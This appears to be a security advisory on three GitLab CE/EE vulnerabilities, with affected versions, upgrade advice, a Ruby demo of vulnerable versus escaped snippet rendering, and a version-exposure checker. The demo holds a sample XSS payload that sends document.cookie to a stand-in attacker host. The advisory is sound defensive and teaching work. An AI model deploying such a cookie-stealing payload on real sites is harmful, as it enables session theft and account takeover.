Rewterz

Multiple GitLab Products Vulnerabilities

Severity

Medium

Analysis Summary

CVE-2025-4278 (CVSS 8.7)

HTML injection / cross-site scripting in GitLab CE/EE. Under certain conditions, malicious HTML can be injected into the search page and rendered in the browser of the user viewing it, potentially leading to account takeover.

CVE-2025-2254 (CVSS 8.7)

Cross-site scripting (XSS) in the GitLab CE/EE snippet viewer. Because snippet content is not properly output-encoded when rendered, a malicious user can store HTML or JavaScript in a snippet that executes in the browser of any user who views that snippet (stored XSS).

CVE-2025-5121 (CVSS 8.5)

Missing authorization in GitLab Ultimate Enterprise Edition (EE). An authenticated user who lacks the required permissions can inject CI/CD jobs into the pipelines of every project on an Ultimate-licensed instance, so attacker-supplied jobs run inside those projects' pipelines.
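As an added illustration of the vulnerability class, not GitLab's code and not the actual defect in the snippet viewer (the advisory gives no implementation detail), the Ruby below shows a snippet renderer that interpolates user-controlled fields straight into HTML beside one that escapes at the output boundary, plus a small check that flags markup originating from user input. The snippet payload, the template and the helper names are all constructed for the example.

```ruby
require "erb"

# Constructed sample input (not a real GitLab snippet): the title carries an
# attribute-context payload, the body a text-context payload.
MALICIOUS_SNIPPET = {
  title:   %(notes" onmouseover="alert(document.domain)),
  content: %(<script>location="https://attacker.example/?c="+document.cookie</script>),
}.freeze

# Vulnerable renderer (illustrative): user-controlled fields are interpolated
# straight into HTML, so any "<", ">" or quote in them becomes live markup.
def render_snippet_vulnerable(snippet)
  %(<div class="snippet" title="#{snippet[:title]}"><pre>#{snippet[:content]}</pre></div>)
end

# Hardened renderer: HTML-escape every user-controlled value at the output
# boundary. ERB::Util.html_escape encodes & < > " and ', which covers both the
# element-text context (<pre>) and the double-quoted attribute context (title=).
def render_snippet_safe(snippet)
  esc = ->(value) { ERB::Util.html_escape(value.to_s) }
  %(<div class="snippet" title="#{esc.(snippet[:title])}"><pre>#{esc.(snippet[:content])}</pre></div>)
end

# Regression check for this template: element names that appear in the output
# but are not emitted by the template itself came from user input.
TEMPLATE_TAGS = %w[div pre].freeze

def injected_tags(html)
  html.scan(%r{<([a-z][a-z0-9]*)}i).flatten.map(&:downcase).uniq - TEMPLATE_TAGS
end

# The template never emits on* event-handler attributes, so any on*="..."
# in the output was injected. An escaped value (on*=&quot;) does not match.
def injected_event_handlers(html)
  html.scan(/\s(on[a-z]+)\s*=\s*"/i).flatten.map(&:downcase).uniq
end

if __FILE__ == $PROGRAM_NAME
  vuln = render_snippet_vulnerable(MALICIOUS_SNIPPET)
  safe = render_snippet_safe(MALICIOUS_SNIPPET)
  puts "vulnerable: #{vuln}"
  puts "  injected tags=#{injected_tags(vuln).inspect} handlers=#{injected_event_handlers(vuln).inspect}"
  puts "hardened:   #{safe}"
  puts "  injected tags=#{injected_tags(safe).inspect} handlers=#{injected_event_handlers(safe).inspect}"
end
```

The point of escaping at the output boundary rather than on input is that the stored snippet keeps its literal characters (a snippet legitimately containing `<script>` as text must still display), while the rendered page can no longer turn them into live elements or attributes.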

Impact

  • Cross-site Scripting
  • Gain Access

Indicators of Compromise

CVE

  • CVE-2025-4278
  • CVE-2025-2254
  • CVE-2025-5121

Affected Vendors

  • GitLab

Affected Products

  • CVE-2025-4278: GitLab CE/EE 18.0 up to, but not including, 18.0.2
  • CVE-2025-2254: GitLab CE/EE 17.9 up to, but not including, 17.10.8; 17.11 up to, but not including, 17.11.4; 18.0 up to, but not including, 18.0.2
  • CVE-2025-5121: GitLab Ultimate EE 17.11 up to, but not including, 17.11.4; 18.0 up to, but not including, 18.0.2

Remediation

Upgrade self-managed instances to a fixed release for the minor line in use: 18.0.2, 17.11.4 or 17.10.8, or any later version. Fixed builds are available from the GitLab website; GitLab.com already runs a patched version.
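To turn the affected ranges above into a check an administrator can run against the version string an instance reports (for example from `GET /api/v4/version` or `gitlab-rake gitlab:env:info`), here is an added Ruby example. It is not GitLab's own tooling; the range table is transcribed from the Affected Products list, the function names are assumptions, and the only library used is Ruby's built-in Gem::Version.

```ruby
# Affected ranges per CVE as [lower_inclusive, upper_exclusive] pairs,
# transcribed from the Affected Products list. The upper bound of each range
# is the first fixed release on that line.
AFFECTED_RANGES = {
  "CVE-2025-4278" => { ultimate_only: false,
                       ranges: [["18.0", "18.0.2"]] },
  "CVE-2025-2254" => { ultimate_only: false,
                       ranges: [["17.9", "17.10.8"], ["17.11", "17.11.4"], ["18.0", "18.0.2"]] },
  "CVE-2025-5121" => { ultimate_only: true,
                       ranges: [["17.11", "17.11.4"], ["18.0", "18.0.2"]] },
}.freeze

# GitLab reports versions such as "18.0.1-ee". Gem::Version would treat "-ee"
# as a prerelease tag and sort it *below* 18.0.1, so strip the edition suffix
# before comparing.
def parse_gitlab_version(raw)
  core = raw.to_s.strip.sub(/-.*\z/, "")
  raise ArgumentError, "unrecognised GitLab version: #{raw.inspect}" unless core.match?(/\A\d+(\.\d+)*\z/)
  Gem::Version.new(core)
end

def in_range?(version, lower, upper)
  version >= Gem::Version.new(lower) && version < Gem::Version.new(upper)
end

# CVE IDs the given instance is exposed to. Pass ultimate: true for an
# Ultimate-licensed EE instance; CVE-2025-5121 is otherwise not applicable.
def exposed_cves(raw_version, ultimate: false)
  v = parse_gitlab_version(raw_version)
  AFFECTED_RANGES.select do |_cve, info|
    next false if info[:ultimate_only] && !ultimate
    info[:ranges].any? { |lower, upper| in_range?(v, lower, upper) }
  end.keys
end

# Earliest release that closes every range the version falls into, or nil
# when the version is already outside all of them. Note that the 17.9 line has
# no fix of its own: the range "17.9 up to 17.10.8" resolves to 17.10.8.
def minimum_fixed_version(raw_version)
  v = parse_gitlab_version(raw_version)
  uppers = AFFECTED_RANGES.values
                          .flat_map { |info| info[:ranges] }
                          .select { |lower, upper| in_range?(v, lower, upper) }
                          .map { |_lower, upper| Gem::Version.new(upper) }
  uppers.max&.to_s
end

if __FILE__ == $PROGRAM_NAME
  %w[18.0.1-ee 17.11.3-ee 17.10.7-ce 17.9.0-ce 18.0.2-ee].each do |ver|
    puts format("%-12s exposed=%-50s fix=%s", ver,
                exposed_cves(ver, ultimate: true).inspect,
                minimum_fixed_version(ver).inspect)
  end
end
```

Feed the checker the exact string the instance reports rather than a hand-typed version, and set `ultimate: true` from the licence actually installed; an EE build without an Ultimate licence is outside the stated scope of CVE-2025-5121 but still needs the upgrade for the two XSS issues.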